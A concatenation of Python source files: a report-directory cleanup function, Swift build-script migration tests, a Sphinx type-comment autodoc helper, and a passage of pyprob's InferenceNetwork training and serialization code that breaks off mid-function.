def unlink_expired():
"""Delete all report directories that are expired and unlocked"""
for data_dir in get_report_data_dir().iterdir():
lock_dir = LockableDirectory(data_dir)
if not lock_dir.acquire():
continue
expire_dir = ExpireableDirectory(data_dir)
if expire_dir.is_expired():
logging.debug("Unlinking %s", str(data_dir))
shutil.rmtree(data_dir)
# No need to release lock after deletion
else:
lock_dir.release()
|
utils/build_swift/tests/build_swift/test_migration.py | gandhi56/swift | 72,551 | 11195573 | <filename>utils/build_swift/tests/build_swift/test_migration.py
# This source file is part of the Swift.org open source project
#
# Copyright (c) 2014 - 2020 Apple Inc. and the Swift project authors
# Licensed under Apache License v2.0 with Runtime Library Exception
#
# See https://swift.org/LICENSE.txt for license information
# See https://swift.org/CONTRIBUTORS.txt for the list of Swift project authors
from __future__ import absolute_import, unicode_literals
import platform
import unittest
from build_swift import argparse
from build_swift import migration
from build_swift.constants import BUILD_SCRIPT_IMPL_PATH
import six
from swift_build_support.swift_build_support.targets import StdlibDeploymentTarget
# -----------------------------------------------------------------------------
# Helpers
def _get_sdk_targets(sdk_names):
targets = []
for sdk_name in sdk_names:
targets += StdlibDeploymentTarget.get_migrated_targets_for_sdk(sdk_name)
return targets
def _get_sdk_target_names(sdk_names):
return [target.name for target in _get_sdk_targets(sdk_names)]
# -----------------------------------------------------------------------------
# Migrate Swift SDKs
class TestMigrateSwiftSDKsMeta(type):
"""Metaclass used to dynamically generate test methods.
"""
def __new__(cls, name, bases, attrs):
# Generate tests for migrating each Swift SDK
for sdk_name in StdlibDeploymentTarget.get_all_migrated_sdks():
test_name = 'test_migrate_swift_sdk_{}'.format(sdk_name)
attrs[test_name] = cls.generate_migrate_swift_sdks_test(sdk_name)
return super(TestMigrateSwiftSDKsMeta, cls).__new__(
cls, name, bases, attrs)
@classmethod
def generate_migrate_swift_sdks_test(cls, sdk_name):
def test(self):
args = ['--swift-sdks={}'.format(sdk_name)]
args = migration.migrate_swift_sdks(args)
target_names = _get_sdk_target_names([sdk_name])
self.assertListEqual(args, [
'--stdlib-deployment-targets={}'.format(' '.join(target_names))
])
return test
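    # So for an SDK named "OSX" this generates a method called
    # test_migrate_swift_sdk_OSX, whose body checks that "--swift-sdks=OSX"
    # is rewritten into the matching --stdlib-deployment-targets flag.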
@six.add_metaclass(TestMigrateSwiftSDKsMeta)
class TestMigrateSwiftSDKs(unittest.TestCase):
def test_empty_swift_sdks(self):
args = migration.migrate_swift_sdks(['--swift-sdks='])
self.assertListEqual(args, ['--stdlib-deployment-targets='])
def test_multiple_swift_sdk_flags(self):
sdks = ['OSX', 'IOS', 'IOS_SIMULATOR']
args = [
'--swift-sdks=',
'--swift-sdks={}'.format(';'.join(sdks))
]
args = migration.migrate_swift_sdks(args)
target_names = _get_sdk_target_names(sdks)
self.assertListEqual(args, [
'--stdlib-deployment-targets=',
'--stdlib-deployment-targets={}'.format(' '.join(target_names))
])
# -----------------------------------------------------------------------------
class TestMigrateParseArgs(unittest.TestCase):
def test_report_unknown_args(self):
parser = argparse.ArgumentParser()
parser.add_argument('-R', '--release', action='store_true')
parser.add_argument('-T', '--validation-test', action='store_true')
parser.add_argument('--darwin-xcrun-toolchain')
args = migration.parse_args(parser, [
'-RT',
'--unknown', 'true',
'--darwin-xcrun-toolchain=foo',
'--',
'--darwin-xcrun-toolchain=bar',
'--other',
])
expected = argparse.Namespace(
release=True,
validation_test=True,
darwin_xcrun_toolchain='bar',
build_script_impl_args=['--unknown', 'true', '--other'])
self.assertEqual(args, expected)
def test_no_unknown_args(self):
parser = argparse.ArgumentParser()
parser.add_argument('-R', '--release', action='store_true')
parser.add_argument('-T', '--validation-test', action='store_true')
parser.add_argument('--darwin-xcrun-toolchain')
args = migration.parse_args(
parser, ['-RT', '--darwin-xcrun-toolchain=bar'])
expected = argparse.Namespace(
release=True,
validation_test=True,
darwin_xcrun_toolchain='bar',
build_script_impl_args=[])
self.assertEqual(args, expected)
def test_forward_impl_args(self):
parser = argparse.ArgumentParser()
parser.add_argument('--skip-test-swift',
dest='impl_skip_test_swift',
action='store_true')
parser.add_argument('--install-swift',
dest='impl_install_swift',
action='store_true')
args = migration.parse_args(
parser, ['--skip-test-swift', '--install-swift'])
expected = argparse.Namespace(
build_script_impl_args=['--skip-test-swift', '--install-swift'])
self.assertEqual(args, expected)
class TestMigrationCheckImplArgs(unittest.TestCase):
def test_check_impl_args(self):
if platform.system() == 'Windows':
self.skipTest("build-script-impl cannot run in Windows")
return
self.assertIsNone(migration.check_impl_args(
BUILD_SCRIPT_IMPL_PATH, ['--reconfigure']))
with self.assertRaises(ValueError) as cm:
migration.check_impl_args(
BUILD_SCRIPT_IMPL_PATH, ['foo'])
self.assertIn('foo', str(cm.exception))
with self.assertRaises(ValueError) as cm:
migration.check_impl_args(
BUILD_SCRIPT_IMPL_PATH, ['--reconfigure', '--foo=true'])
self.assertIn('foo', str(cm.exception))
|
docs/autodoc/type_comment.py | ishine/cotk | 117 | 11195611 | <filename>docs/autodoc/type_comment.py
"""
autodoc.type_comment
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Update annotations info of living objects using type_comments.
:copyright: Copyright 2007-2020 by the Sphinx team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import ast
from inspect import getsource
from typing import Any, Dict
from typing import cast
import sphinx
from sphinx.application import Sphinx
from sphinx.pycode.ast import parse as ast_parse
from sphinx.pycode.ast import unparse as ast_unparse
from sphinx.util import inspect
from sphinx.util import logging
logger = logging.getLogger(__name__)
def get_type_comment(obj: Any) -> ast.FunctionDef:
"""Get type_comment'ed FunctionDef object from living object.
This tries to parse original code for living object and returns
AST node for given *obj*. It requires py38+ or typed_ast module.
"""
try:
source = getsource(obj)
        if source.startswith((' ', '\t')):
            # subject is nested inside a class or block. To parse its
            # source, this adds an if-block before the declaration.
module = ast_parse('if True:\n' + source)
subject = cast(ast.FunctionDef, module.body[0].body[0]) # type: ignore
else:
module = ast_parse(source)
subject = cast(ast.FunctionDef, module.body[0]) # type: ignore
if getattr(subject, "type_comment", None):
return ast_parse(subject.type_comment, mode='func_type') # type: ignore
else:
return None
except (OSError, TypeError): # failed to load source code
return None
except SyntaxError: # failed to parse type_comments
return None
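# Sketch of what this recovers (assuming py38+ or typed_ast): for a function
# written as
#
#     def add(a, b):
#         # type: (int, int) -> int
#         return a + b
#
# the returned node is the AST of "(int, int) -> int" parsed in 'func_type'
# mode, i.e. it has .argtypes with two entries and .returns for the result
# annotation.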
def update_annotations_using_type_comments(app: Sphinx, obj: Any, bound_method: bool) -> None:
"""Update annotations info of *obj* using type_comments."""
try:
function = get_type_comment(obj)
if function and hasattr(function, 'argtypes'):
if function.argtypes != [ast.Ellipsis]: # type: ignore
sig = inspect.signature(obj, bound_method)
for i, param in enumerate(sig.parameters.values()):
if param.name not in obj.__annotations__:
annotation = ast_unparse(function.argtypes[i]) # type: ignore
obj.__annotations__[param.name] = annotation
if 'return' not in obj.__annotations__:
obj.__annotations__['return'] = ast_unparse(function.returns) # type: ignore
except NotImplementedError as exc: # failed to ast.unparse()
logger.warning("Failed to parse type_comment for %r: %s", obj, exc)
def setup(app: Sphinx) -> Dict[str, Any]:
app.connect('autodoc-before-process-signature', update_annotations_using_type_comments)
return {'version': sphinx.__display_version__, 'parallel_read_safe': True}
|
pyprob/nn/inference_network.py | probprog/pyprob | 268 | 11195630 | import torch
import torch.nn as nn
import torch.optim as optim
import torch.optim.lr_scheduler as lr_scheduler
import torch.distributed as dist
from torch.utils.data import DataLoader
import sys
import time
import os
import shutil
import uuid
import tempfile
import tarfile
import copy
import math
from threading import Thread
from termcolor import colored
from . import Batch, OfflineDataset, TraceBatchSampler, DistributedTraceBatchSampler, EmbeddingFeedForward, EmbeddingCNN2D5C, EmbeddingCNN3D5C
from .optimizer_larc import LARC
from .. import __version__, util, Optimizer, LearningRateScheduler, ObserveEmbedding
class InferenceNetwork(nn.Module):
# observe_embeddings example: {'obs1': {'embedding':ObserveEmbedding.FEEDFORWARD, 'reshape': [10, 10], 'dim': 32, 'depth': 2}}
def __init__(self, model, observe_embeddings={}, network_type=''):
super().__init__()
self._model = model
self._layers_observe_embedding = nn.ModuleDict()
self._layers_observe_embedding_final = None
self._layers_pre_generated = False
self._layers_initialized = False
self._observe_embeddings = observe_embeddings
self._observe_embedding_dim = None
self._infer_observe = None
self._infer_observe_embedding = {}
self._optimizer = None
self._optimizer_type = None
self._optimizer_state = None
self._momentum = None
self._weight_decay = None
self._learning_rate_scheduler = None
self._learning_rate_scheduler_type = None
self._learning_rate_scheduler_state = None
self._total_train_seconds = 0
self._total_train_traces = 0
self._total_train_traces_end = None
self._total_train_iterations = 0
self._learning_rate_init = None
self._learning_rate_end = None
self._loss_init = None
self._loss_min = float('inf')
self._loss_max = None
self._loss_previous = float('inf')
self._history_train_loss = []
self._history_train_loss_trace = []
self._history_valid_loss = []
self._history_valid_loss_trace = []
self._history_num_params = []
self._history_num_params_trace = []
self._distributed_train_loss = util.to_tensor(0.)
self._distributed_valid_loss = util.to_tensor(0.)
self._distributed_history_train_loss = []
self._distributed_history_train_loss_trace = []
self._distributed_history_valid_loss = []
self._distributed_history_valid_loss_trace = []
self._modified = util.get_time_str()
self._updates = 0
self._on_cuda = False
self._device = torch.device('cpu')
self._learning_rate = None
self._momentum = None
self._batch_size = None
self._distributed_backend = None
self._distributed_world_size = None
self._network_type = network_type
def _init_layers_observe_embedding(self, observe_embeddings, example_trace):
if len(observe_embeddings) == 0:
raise ValueError('At least one observe embedding is needed to initialize inference network.')
observe_embedding_total_dim = 0
for name, value in observe_embeddings.items():
variable = example_trace.named_variables[name]
# distribution = variable.distribution
# if distribution is None:
# raise ValueError('Observable {}: cannot use this observation as an input to the inference network, because there is no associated likelihood.'.format(name))
# else:
if 'reshape' in value:
input_shape = torch.Size(value['reshape'])
print('Observable {}: reshape to {}.'.format(name, input_shape))
else:
input_shape = variable.value.size()
print('Observable {}: reshape not specified, using shape {}.'.format(name, input_shape))
if 'dim' in value:
output_shape = torch.Size([value['dim']])
print('Observable {}: using embedding dim {}.'.format(name, output_shape))
else:
print('Observable {}: embedding dim not specified, using the default 256.'.format(name))
output_shape = torch.Size([256])
if 'embedding' in value:
embedding = value['embedding']
print('Observable {}: using observe embedding {}.'.format(name, embedding))
else:
print('Observable {}: observe embedding not specified, using the default FEEDFORWARD.'.format(name))
embedding = ObserveEmbedding.FEEDFORWARD
if embedding == ObserveEmbedding.FEEDFORWARD:
if 'depth' in value:
depth = value['depth']
print('Observable {}: using embedding depth {}.'.format(name, depth))
else:
print('Observable {}: embedding depth not specified, using the default 2.'.format(name))
depth = 2
layer = EmbeddingFeedForward(input_shape=input_shape, output_shape=output_shape, num_layers=depth)
elif embedding == ObserveEmbedding.CNN2D5C:
layer = EmbeddingCNN2D5C(input_shape=input_shape, output_shape=output_shape)
elif embedding == ObserveEmbedding.CNN3D5C:
layer = EmbeddingCNN3D5C(input_shape=input_shape, output_shape=output_shape)
else:
raise ValueError('Unknown embedding: {}'.format(embedding))
layer.to(device=util._device)
self._layers_observe_embedding[name] = layer
observe_embedding_total_dim += util.prod(output_shape)
self._observe_embedding_dim = observe_embedding_total_dim
print('Observe embedding dimension: {}'.format(self._observe_embedding_dim))
self._layers_observe_embedding_final = EmbeddingFeedForward(input_shape=self._observe_embedding_dim, output_shape=self._observe_embedding_dim, num_layers=2)
self._layers_observe_embedding_final.to(device=util._device)
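    # Sizing sketch for the embeddings above: with observe_embeddings such
    # as {'obs1': {'dim': 32}, 'obs2': {}} the per-observable outputs are 32
    # and 256 (the default) wide, so _observe_embedding_dim becomes 288 and
    # the final feed-forward layer maps 288 features to 288.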
def _embed_observe(self, traces=None):
embedding = []
for name, layer in self._layers_observe_embedding.items():
values = torch.stack([util.to_tensor(trace.named_variables[name].value) for trace in traces]).view(len(traces), -1)
embedding.append(layer(values))
embedding = torch.cat(embedding, dim=1)
embedding = self._layers_observe_embedding_final(embedding)
return embedding
def _infer_init(self, observe=None):
self._infer_observe = observe
embedding = []
for name, layer in self._layers_observe_embedding.items():
value = util.to_tensor(observe[name]).view(1, -1)
embedding.append(layer(value))
embedding = torch.cat(embedding, dim=1)
self._infer_observe_embedding = self._layers_observe_embedding_final(embedding)
def _init_layers(self):
raise NotImplementedError()
def _polymorph(self, batch):
raise NotImplementedError()
def _infer_step(self, variable, previous_variable=None, proposal_min_train_iterations=None):
raise NotImplementedError()
def _loss(self, batch):
raise NotImplementedError()
def _save(self, file_name):
self._modified = util.get_time_str()
self._updates += 1
data = {}
data['pyprob_version'] = __version__
data['torch_version'] = torch.__version__
# The following is due to a temporary hack related with https://github.com/pytorch/pytorch/issues/9981 and can be deprecated by using dill as pickler with torch > 0.4.1
data['inference_network'] = copy.copy(self)
data['inference_network']._model = None
data['inference_network']._optimizer = None
if self._optimizer is None:
data['inference_network']._optimizer_state = None
else:
data['inference_network']._optimizer_state = self._optimizer.state_dict()
data['inference_network']._learning_rate_scheduler = None
if self._learning_rate_scheduler is None:
data['inference_network']._learning_rate_scheduler_state = None
else:
data['inference_network']._learning_rate_scheduler_state = self._learning_rate_scheduler.state_dict()
def thread_save():
tmp_dir = tempfile.mkdtemp(suffix=str(uuid.uuid4()))
tmp_file_name = os.path.join(tmp_dir, 'pyprob_inference_network')
torch.save(data, tmp_file_name)
tar = tarfile.open(file_name, 'w:gz', compresslevel=2)
tar.add(tmp_file_name, arcname='pyprob_inference_network')
tar.close()
shutil.rmtree(tmp_dir)
t = Thread(target=thread_save)
t.start()
t.join()
@staticmethod
def _load(file_name):
try:
tar = tarfile.open(file_name, 'r:gz')
tmp_dir = tempfile.mkdtemp(suffix=str(uuid.uuid4()))
tmp_file = os.path.join(tmp_dir, 'pyprob_inference_network')
tar.extract('pyprob_inference_network', tmp_dir)
tar.close()
if util._cuda_enabled:
data = torch.load(tmp_file)
else:
data = torch.load(tmp_file, map_location=lambda storage, loc: storage)
shutil.rmtree(tmp_dir)
except Exception as e:
print(e)
raise RuntimeError('Cannot load inference network.')
if data['pyprob_version'] != __version__:
print(colored('Warning: different pyprob versions (loaded network: {}, current system: {})'.format(data['pyprob_version'], __version__), 'red', attrs=['bold']))
if data['torch_version'] != torch.__version__:
print(colored('Warning: different PyTorch versions (loaded network: {}, current system: {})'.format(data['torch_version'], torch.__version__), 'red', attrs=['bold']))
ret = data['inference_network']
if util._cuda_enabled:
if ret._on_cuda:
if ret._device != util._device:
print(colored('Warning: loading CUDA (device {}) network to CUDA (device {})'.format(ret._device, util._device), 'red', attrs=['bold']))
else:
print(colored('Warning: loading CPU network to CUDA (device {})'.format(util._device), 'red', attrs=['bold']))
else:
if ret._on_cuda:
print(colored('Warning: loading CUDA (device {}) network to CPU'.format(ret._device), 'red', attrs=['bold']))
ret.to(device=util._device)
# For compatibility loading NNs saved before 0.13.2.dev2
if not hasattr(ret, '_distributed_train_loss'):
ret._distributed_train_loss = util.to_tensor(0.)
if not hasattr(ret, '_distributed_valid_loss'):
ret._distributed_valid_loss = util.to_tensor(0.)
if not hasattr(ret, '_distributed_history_train_loss'):
ret._distributed_history_train_loss = []
if not hasattr(ret, '_distributed_history_train_loss_trace'):
ret._distributed_history_train_loss_trace = []
if not hasattr(ret, '_distributed_history_valid_loss'):
ret._distributed_history_valid_loss = []
if not hasattr(ret, '_distributed_history_valid_loss_trace'):
ret._distributed_history_valid_loss_trace = []
if not hasattr(ret, '_optimizer_state'):
ret._optimizer_state = None
if not hasattr(ret, '_learning_rate_scheduler_state'):
ret._learning_rate_scheduler_state = None
# For compatibility loading NNs saved before 0.13.2.dev5
if not hasattr(ret, '_total_train_traces_end'):
ret._total_train_traces_end = None
# For compatibility loading NNs saved before 0.13.2.dev6
if not hasattr(ret, '_loss_init'):
ret._loss_init = None
if not hasattr(ret, '_learning_rate_init'):
ret._learning_rate_init = 0
if not hasattr(ret, '_learning_rate_end'):
ret._learning_rate_end = 0
if not hasattr(ret, '_weight_decay'):
ret._weight_decay = 0
if not hasattr(ret, '_learning_rate_scheduler_type'):
ret._learning_rate_scheduler_type = None
ret._create_optimizer(ret._optimizer_state)
ret._create_lr_scheduler(ret._learning_rate_scheduler_state)
return ret
def to(self, device=None, *args, **kwargs):
self._device = device
self._on_cuda = 'cuda' in str(device)
super().to(device=device, *args, *kwargs)
def _pre_generate_layers(self, dataset, batch_size=64, save_file_name_prefix=None):
if not self._layers_initialized:
self._init_layers_observe_embedding(self._observe_embeddings, example_trace=dataset.__getitem__(0))
self._init_layers()
self._layers_initialized = True
self._layers_pre_generated = True
dataloader = DataLoader(dataset, batch_size=batch_size, shuffle=False, num_workers=0, collate_fn=lambda x: Batch(x))
util.progress_bar_init('Layer pre-generation...', len(dataset), 'Traces')
i = 0
for i_batch, batch in enumerate(dataloader):
i += len(batch)
layers_changed = self._polymorph(batch)
util.progress_bar_update(i)
if layers_changed and (save_file_name_prefix is not None):
file_name = '{}_00000000_pre_generated.network'.format(save_file_name_prefix)
print('\rSaving to disk... ', end='\r')
self._save(file_name)
util.progress_bar_end('Layer pre-generation complete')
def _distributed_sync_parameters(self):
""" broadcast rank 0 parameter to all ranks """
# print('Distributed training synchronizing parameters across nodes...')
for param in self.parameters():
dist.broadcast(param.data, 0)
def _distributed_sync_grad(self, world_size):
""" all_reduce grads from all ranks """
# print('Distributed training synchronizing gradients across nodes...')
# make a local map of all non-zero gradients
ttmap = util.to_tensor([1 if p.grad is not None else 0 for p in self.parameters()])
# get the global map of all non-zero gradients
pytorch_allreduce_supports_list = True
try:
dist.all_reduce([ttmap])
except:
pytorch_allreduce_supports_list = False
dist.all_reduce(ttmap)
gl = []
for i, param in enumerate(self.parameters()):
if param.grad is not None:
gl.append(param.grad.data)
elif ttmap[i]:
# someone else had a non-zero grad so make a local zero'd copy
param.grad = util.to_tensor(torch.zeros_like(param.data))
gl.append(param.grad.data)
# reduce all gradients used by at least one rank
if pytorch_allreduce_supports_list:
dist.all_reduce(gl)
else:
for g in gl:
dist.all_reduce(g)
# average them
for li in gl:
li /= float(world_size)
def _distributed_update_train_loss(self, loss, world_size):
self._distributed_train_loss = util.to_tensor(float(loss))
dist.all_reduce(self._distributed_train_loss)
self._distributed_train_loss /= float(world_size)
self._distributed_history_train_loss.append(float(self._distributed_train_loss))
self._distributed_history_train_loss_trace.append(self._total_train_traces)
return self._distributed_train_loss
def _distributed_update_valid_loss(self, loss, world_size):
self._distributed_valid_loss = util.to_tensor(float(loss))
dist.all_reduce(self._distributed_valid_loss)
self._distributed_valid_loss /= float(world_size)
self._distributed_history_valid_loss.append(float(self._distributed_valid_loss))
self._distributed_history_valid_loss_trace.append(self._total_train_traces)
return self._distributed_valid_loss
def _create_optimizer(self, state_dict=None):
if self._optimizer_type is None: # happens when loading pre-generated network
return
# print('Creating new optimizer')
if self._optimizer_type in [Optimizer.ADAM, Optimizer.ADAM_LARC]:
self._optimizer = optim.Adam(self.parameters(), lr=self._learning_rate_init, weight_decay=self._weight_decay)
else: # optimizer_type in [Optimizer.SGD, Optimizer.SGD_LARC]
self._optimizer = optim.SGD(self.parameters(), lr=self._learning_rate_init, momentum=self._momentum, nesterov=True, weight_decay=self._weight_decay)
if self._optimizer_type in [Optimizer.ADAM_LARC, Optimizer.SGD_LARC]:
self._optimizer = LARC(self._optimizer)
if state_dict is not None:
# print('Setting optimizer state')
self._optimizer.load_state_dict(state_dict)
def _create_lr_scheduler(self, state_dict=None):
if self._learning_rate_scheduler_type is None: # happens when loading pre-generated network
return
# print('Creating new learning rate scheduler')
learning_rate_scheduler_type = self._learning_rate_scheduler_type
iter_end = self._total_train_traces_end
lr_init = self._learning_rate_init
lr_end = self._learning_rate_end
def _poly_decay(iter, power):
return (lr_init - lr_end) * ((1 - iter/iter_end) ** power) + lr_end
if self._optimizer is None:
self._learning_rate_scheduler = None
elif learning_rate_scheduler_type == LearningRateScheduler.POLY1:
self._learning_rate_scheduler = lr_scheduler.LambdaLR(self._optimizer, lr_lambda=lambda iter: _poly_decay(iter, power=1.) / lr_init)
elif learning_rate_scheduler_type == LearningRateScheduler.POLY2:
self._learning_rate_scheduler = lr_scheduler.LambdaLR(self._optimizer, lr_lambda=lambda iter: _poly_decay(iter, power=2.) / lr_init)
else:
self._learning_rate_scheduler = None
if self._learning_rate_scheduler is not None and state_dict is not None:
# print('Setting learning rate scheduler state')
self._learning_rate_scheduler.load_state_dict(state_dict)
def optimize(self, num_traces, dataset, dataset_valid=None, num_traces_end=1e9, batch_size=64, valid_every=None, optimizer_type=Optimizer.ADAM, learning_rate_init=0.0001, learning_rate_end=1e-6, learning_rate_scheduler_type=LearningRateScheduler.NONE, momentum=0.9, weight_decay=1e-5, save_file_name_prefix=None, save_every_sec=600, distributed_backend=None, distributed_params_sync_every_iter=10000, distributed_num_buckets=10, dataloader_offline_num_workers=0, stop_with_bad_loss=False, log_file_name=None):
if not self._layers_initialized:
self._init_layers_observe_embedding(self._observe_embeddings, example_trace=dataset.__getitem__(0))
self._init_layers()
self._layers_initialized = True
if distributed_backend is None:
distributed_world_size = 1
distributed_rank = 0
else:
dist.init_process_group(backend=distributed_backend)
distributed_world_size = dist.get_world_size()
distributed_rank = dist.get_rank()
self._distributed_backend = distributed_backend
self._distributed_world_size = distributed_world_size
# Training data loader
if isinstance(dataset, OfflineDataset):
if distributed_world_size == 1:
dataloader = DataLoader(dataset, batch_sampler=TraceBatchSampler(dataset, batch_size=batch_size, shuffle_batches=True), num_workers=dataloader_offline_num_workers, collate_fn=lambda x: Batch(x))
else:
dataloader = DataLoader(dataset, batch_sampler=DistributedTraceBatchSampler(dataset, batch_size=batch_size, num_buckets=distributed_num_buckets, shuffle_batches=True, shuffle_buckets=True), num_workers=dataloader_offline_num_workers, collate_fn=lambda x: Batch(x))
else:
dataloader = DataLoader(dataset, batch_size=batch_size, num_workers=0, collate_fn=lambda x: Batch(x))
# Validation data loader
if dataset_valid is not None:
if distributed_world_size == 1:
dataloader_valid = DataLoader(dataset_valid, batch_sampler=TraceBatchSampler(dataset_valid, batch_size=batch_size, shuffle_batches=True), num_workers=dataloader_offline_num_workers, collate_fn=lambda x: Batch(x))
else:
dataloader_valid = DataLoader(dataset_valid, batch_sampler=DistributedTraceBatchSampler(dataset_valid, batch_size=batch_size, num_buckets=distributed_num_buckets, shuffle_batches=True, shuffle_buckets=True), num_workers=dataloader_offline_num_workers, collate_fn=lambda x: Batch(x))
if not self._layers_pre_generated:
for i_batch, batch in enumerate(dataloader_valid):
self._polymorph(batch)
if distributed_world_size > 1:
util.init_distributed_print(distributed_rank, distributed_world_size, False)
if distributed_rank == 0:
print(colored('Distributed synchronous training', 'yellow', attrs=['bold']))
print(colored('Distributed backend : {}'.format(distributed_backend), 'yellow', attrs=['bold']))
print(colored('Distributed world size : {}'.format(distributed_world_size), 'yellow', attrs=['bold']))
print(colored('Distributed minibatch size : {} (global effective), {} (per rank)'.format(batch_size * distributed_world_size, batch_size), 'yellow', attrs=['bold']))
print(colored('Distributed init.learn rate: {} (global), {} (base)'.format(learning_rate_init * math.sqrt(distributed_world_size), learning_rate_init), 'yellow', attrs=['bold']))
print(colored('Distributed optimizer : {}'.format(str(optimizer_type)), 'yellow', attrs=['bold']))
print(colored('Distributed dataset size : {:,}'.format(len(dataset)), 'yellow', attrs=['bold']))
print(colored('Distributed num. buckets : {:,}'.format(len(dataloader.batch_sampler._buckets)), 'yellow', attrs=['bold']))
# bucket_size = math.ceil((len(dataset) / batch_size) / distributed_num_buckets)
# print(colored('Distributed bucket size : {:,} minibatches ({:,} traces)'.format(bucket_size, bucket_size * batch_size), 'yellow', attrs=['bold']))
self.train()
prev_total_train_seconds = self._total_train_seconds
time_start = time.time()
time_loss_min = time_start
time_last_batch = time_start
if valid_every is None:
valid_every = max(100, num_traces / 1000)
last_validation_trace = -valid_every + 1
valid_loss = 0
if self._optimizer_type is None:
self._optimizer_type = optimizer_type
if self._momentum is None:
self._momentum = momentum
if self._weight_decay is None:
self._weight_decay = weight_decay
if self._learning_rate_scheduler_type is None:
self._learning_rate_scheduler_type = learning_rate_scheduler_type
if self._learning_rate_init is None:
self._learning_rate_init = learning_rate_init * math.sqrt(distributed_world_size)
if self._learning_rate_end is None:
self._learning_rate_end = learning_rate_end
if self._total_train_traces_end is None:
self._total_train_traces_end = num_traces_end
epoch = 0
trace = 0
stop = False
print('Train. time | Epoch| Trace | Init. loss| Min. loss | Curr. loss| T.since min | Learn.rate| Traces/sec')
max_print_line_len = 0
loss_min_str = ''
time_since_loss_min_str = ''
loss_init_str = '' if self._loss_init is None else '{:+.2e}'.format(self._loss_init)
if save_every_sec is not None:
last_auto_save_time = time_start - save_every_sec
last_print = time_start - util._print_refresh_rate
if (distributed_rank == 0) and log_file_name is not None:
log_file = open(log_file_name, mode='w', buffering=1)
log_file.write('time, iteration, trace, loss, valid_loss, learning_rate, mean_trace_length_controlled, sub_mini_batches, distributed_bucket_id, traces_per_second\n')
while not stop:
epoch += 1
for i_batch, batch in enumerate(dataloader):
time_batch = time.time()
# Important, a self._distributed_sync_parameters() needs to happen at the very beginning of a training
if (distributed_world_size > 1) and (self._total_train_iterations % distributed_params_sync_every_iter == 0):
self._distributed_sync_parameters()
if self._layers_pre_generated: # and (distributed_world_size > 1):
layers_changed = False
else:
layers_changed = self._polymorph(batch)
if (self._optimizer is None) or layers_changed:
self._create_optimizer()
self._create_lr_scheduler()
# print(self._optimizer.state[self._optimizer.param_groups[0]['params'][0]])
self._optimizer.zero_grad()
success, loss = self._loss(batch)
if not success:
print(colored('Cannot compute loss, skipping batch. Loss: {}'.format(loss), 'red', attrs=['bold']))
if stop_with_bad_loss:
return
else:
loss.backward()
if distributed_world_size > 1:
self._distributed_sync_grad(distributed_world_size)
self._optimizer.step()
loss = float(loss)
if (distributed_world_size > 1):
loss = self._distributed_update_train_loss(loss, distributed_world_size)
if self._loss_init is None:
self._loss_init = loss
self._loss_max = loss
loss_init_str = '{:+.2e}'.format(self._loss_init)
# loss_max_str = '{:+.3e}'.format(self._loss_max)
if loss < self._loss_min:
self._loss_min = loss
loss_str = colored('{:+.2e}'.format(loss), 'green', attrs=['bold'])
loss_min_str = colored('{:+.2e}'.format(self._loss_min), 'green', attrs=['bold'])
time_loss_min = time_batch
time_since_loss_min_str = colored(util.days_hours_mins_secs_str(0), 'green', attrs=['bold'])
elif loss > self._loss_max:
self._loss_max = loss
loss_str = colored('{:+.2e}'.format(loss), 'red', attrs=['bold'])
# loss_max_str = colored('{:+.3e}'.format(self._loss_max), 'red', attrs=['bold'])
else:
if loss < self._loss_previous:
loss_str = colored('{:+.2e}'.format(loss), 'green')
elif loss > self._loss_previous:
loss_str = colored('{:+.2e}'.format(loss), 'red')
else:
loss_str = '{:+.2e}'.format(loss)
loss_min_str = '{:+.2e}'.format(self._loss_min)
# loss_max_str = '{:+.3e}'.format(self._loss_max)
time_since_loss_min_str = util.days_hours_mins_secs_str(time_batch - time_loss_min)
self._loss_previous = loss
self._total_train_iterations += 1
trace += batch.size * distributed_world_size
self._total_train_traces += batch.size * distributed_world_size
self._total_train_seconds = prev_total_train_seconds + (time_batch - time_start)
self._history_train_loss.append(loss)
self._history_train_loss_trace.append(self._total_train_traces)
traces_per_second = batch.size * distributed_world_size / (time_batch - time_last_batch)
if dataset_valid is not None:
if trace - last_validation_trace > valid_every:
print('\nComputing validation loss')
valid_loss = 0
with torch.no_grad():
for i_batch, batch in enumerate(dataloader_valid):
_, v = self._loss(batch)
valid_loss += v
valid_loss = float(valid_loss) / (len(dataloader_valid) / distributed_world_size)
if distributed_world_size > 1:
valid_loss = self._distributed_update_valid_loss(valid_loss, distributed_world_size)
self._history_valid_loss.append(valid_loss)
self._history_valid_loss_trace.append(self._total_train_traces)
last_validation_trace = trace - 1
if (distributed_rank == 0) and (save_file_name_prefix is not None) and (save_every_sec is not None):
if time_batch - last_auto_save_time > save_every_sec:
last_auto_save_time = time_batch
file_name = '{}_{}_traces_{}.network'.format(save_file_name_prefix, util.get_time_stamp(), self._total_train_traces)
print('\rSaving to disk... ', end='\r')
self._save(file_name)
time_last_batch = time_batch
if trace >= num_traces:
print('\nStop condition reached. num_traces: {}'.format(num_traces))
stop = True
if self._total_train_traces >= self._total_train_traces_end:
print(colored('\nStop condition reached. num_traces_end set during network generation: {}'.format(self._total_train_traces_end), 'red', attrs=['bold']))
if self._learning_rate_scheduler is not None:
print(colored('Warning: continuing training with learning rate scheduler beyond num_traces_end, make sure this is intended'.format(self._total_train_traces_end), 'red', attrs=['bold']))
# stop = True
if self._learning_rate_scheduler is not None:
self._learning_rate_scheduler.step(self._total_train_traces) # Gives a DeprecationWarning with PyTorch 1.4.0
learning_rate_current = self._optimizer.param_groups[0]['lr']
learning_rate_current_str = '{:+.2e}'.format(learning_rate_current)
if (time_batch - last_print > util._print_refresh_rate) or stop:
last_print = time_batch
total_training_seconds_str = util.days_hours_mins_secs_str(self._total_train_seconds)
epoch_str = '{:4}'.format('{:,}'.format(epoch))
total_train_traces_str = '{:9}'.format('{:,}'.format(self._total_train_traces))
traces_per_second_str = '{:,.1f}'.format(traces_per_second)
print_line = '{} | {} | {} | {} | {} | {} | {} | {} | {} '.format(total_training_seconds_str, epoch_str, total_train_traces_str, loss_init_str, loss_min_str, loss_str, time_since_loss_min_str, learning_rate_current_str, traces_per_second_str)
max_print_line_len = max(len(print_line), max_print_line_len)
print(print_line.ljust(max_print_line_len), end='\r')
sys.stdout.flush()
if (distributed_rank == 0) and log_file_name is not None:
bucket_id = None
if isinstance(dataloader.batch_sampler, DistributedTraceBatchSampler):
bucket_id = dataloader.batch_sampler._current_bucket_id
